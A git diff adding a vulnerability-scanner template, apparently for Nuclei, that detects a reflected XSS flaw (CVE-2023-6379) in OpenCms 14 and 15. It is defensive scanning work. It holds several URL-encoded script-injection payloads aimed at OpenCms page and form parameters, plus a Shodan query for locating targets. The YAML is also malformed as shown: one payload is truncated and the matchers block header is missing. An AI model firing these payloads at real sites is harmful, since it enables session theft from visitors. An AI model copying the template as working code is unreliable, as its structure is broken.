diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml new file mode 100644 index 0000000000..e0d4cf6047 --- /dev/null +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -0,0 +1,61 @@ +id: CVE-2023-6379 + +info: + name: OpenCMS 14 & 15 - Cross Site Scripting + author: msegoviag + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to version OpenCMS 16 + reference: + - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379 + - https://nvd.nist.gov/vuln/detail/CVE-2023-6379 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6379 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + vendor: alkacon + product: OpenCms + shodan-query: title:"opencms" + tags: cve,cve2023,opencms,xss,alkacon + +http: + - method: GET + path: + - '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' + - '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1">" />' + - 'OpenCms' + condition: and + + - type: word + part: content_type + words: + - "text/html" + + - type: status + status: + - 200